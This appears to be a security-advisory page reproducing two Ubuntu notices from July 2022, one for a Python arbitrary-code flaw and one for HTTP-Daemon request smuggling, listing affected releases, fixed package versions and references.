Note that these packages require that you install our key in the package manager list of trusted sources.

CVE-2022-32389: Swift Downloads

Ubuntu Security Notice 5519-1 - It was discovered that Python incorrectly handled certain inputs. An attacker could possibly use this issue to execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-5519-1  
July 14, 2022

python2.7, python3.10, python3.4, python3.5, python3.6, python3.8,  
python3.9 vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Python could be made to run arbitrary code if it received a specially  
crafted input.

Software Description:  
- python2.7: An interactive high-level object-oriented language  
- python3.10: Interactive high-level object-oriented language (version 3.10)  
- python3.9: Interactive high-level object-oriented language (version 3.9)  
- python3.8: An interactive high-level object-oriented language  
- python3.6: An interactive high-level object-oriented language  
- python3.5: An interactive high-level object-oriented language  
- python3.4: An interactive high-level object-oriented language

Details:

It was discovered that Python incorrectly handled certain inputs.  
An attacker could possibly use this issue to execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  python2.7                       2.7.18-13ubuntu1.1  
  python2.7-minimal               2.7.18-13ubuntu1.1  
  python3.10                      3.10.4-3ubuntu0.1  
  python3.10-minimal              3.10.4-3ubuntu0.1

Ubuntu 21.10:  
  python2.7                       2.7.18-8ubuntu0.2  
  python2.7-minimal               2.7.18-8ubuntu0.2  
  python3.9                       3.9.7-2ubuntu0.1  
  python3.9-minimal               3.9.7-2ubuntu0.1

Ubuntu 20.04 LTS:  
  python2.7                       2.7.18-1~20.04.3  
  python2.7-minimal               2.7.18-1~20.04.3  
  python3.8                       3.8.10-0ubuntu1~20.04.5  
  python3.8-minimal               3.8.10-0ubuntu1~20.04.5

Ubuntu 18.04 LTS:  
  python2.7                       2.7.17-1~18.04ubuntu1.8  
  python2.7-minimal               2.7.17-1~18.04ubuntu1.8  
  python3.6                       3.6.9-1~18.04ubuntu1.8  
  python3.6-minimal               3.6.9-1~18.04ubuntu1.8

Ubuntu 16.04 ESM:  
  python2.7                       2.7.12-1ubuntu0~16.04.18+esm2  
  python2.7-minimal               2.7.12-1ubuntu0~16.04.18+esm2  
  python3.5                       3.5.2-2ubuntu0~16.04.13+esm3  
  python3.5-minimal               3.5.2-2ubuntu0~16.04.13+esm3

Ubuntu 14.04 ESM:  
  python2.7                       2.7.6-8ubuntu0.6+esm11  
  python2.7-minimal               2.7.6-8ubuntu0.6+esm11  
  python3.4                       3.4.3-1ubuntu1~14.04.7+esm13  
  python3.4-minimal               3.4.3-1ubuntu1~14.04.7+esm13

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5519-1  
  CVE-2015-20107

Package Information:  
  https://launchpad.net/ubuntu/+source/python2.7/2.7.18-13ubuntu1.1  
  https://launchpad.net/ubuntu/+source/python3.10/3.10.4-3ubuntu0.1  
  https://launchpad.net/ubuntu/+source/python2.7/2.7.18-8ubuntu0.2  
  https://launchpad.net/ubuntu/+source/python3.9/3.9.7-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/python2.7/2.7.18-1~20.04.3  
  https://launchpad.net/ubuntu/+source/python3.8/3.8.10-0ubuntu1~20.04.5  
  https://launchpad.net/ubuntu/+source/python2.7/2.7.17-1~18.04ubuntu1.8  
  https://launchpad.net/ubuntu/+source/python3.6/3.6.9-1~18.04ubuntu1.8

Ubuntu Security Notice USN-5519-1

Ubuntu Security Notice 5520-1 - It was discovered that HTTP-Daemon incorrectly handled certain crafted requests. A remote attacker could possibly use this issue to perform an HTTP Request Smuggling attack.

==========================================================================  
Ubuntu Security Notice USN-5520-1  
July 14, 2022

libhttp-daemon-perl vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

HTTP-Daemon could allow HTTP Request Smuggling attacks.

Software Description:  
- libhttp-daemon-perl: simple http server class

Details:

It was discovered that HTTP-Daemon incorrectly handled certain crafted  
requests. A remote attacker could possibly use this issue to perform an  
HTTP Request Smuggling attack.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  libhttp-daemon-perl             6.13-1ubuntu0.1

Ubuntu 20.04 LTS:  
  libhttp-daemon-perl             6.06-1ubuntu0.1

Ubuntu 18.04 LTS:  
  libhttp-daemon-perl             6.01-1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5520-1  
  CVE-2022-31081

Package Information:  
  https://launchpad.net/ubuntu/+source/libhttp-daemon-perl/6.13-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/libhttp-daemon-perl/6.06-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/libhttp-daemon-perl/6.01-1ubuntu0.1

Tag

#ubuntu